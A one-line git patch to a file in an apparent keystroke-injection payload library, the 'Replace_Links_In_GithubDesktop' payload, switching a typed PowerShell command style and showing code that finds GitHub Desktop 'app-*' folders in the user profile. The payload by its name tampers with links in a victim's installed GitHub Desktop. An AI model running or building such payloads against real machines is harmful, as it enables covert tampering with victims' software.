From 9f1222ba0534ad94703c9a65704ce00d05f616ac Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 19 Sep 2024 19:55:47 +0200 Subject: [PATCH] Update payload.txt --- .../execution/Replace_Links_In_GithubDesktop/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt index 097750f..fa98a6c 100644 --- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt @@ -73,7 +73,7 @@ DELAY 1000 STRINGLN PowerShell DELAY 1000 -STRINGLN +STRINGLN_POWERSHELL $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY" $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }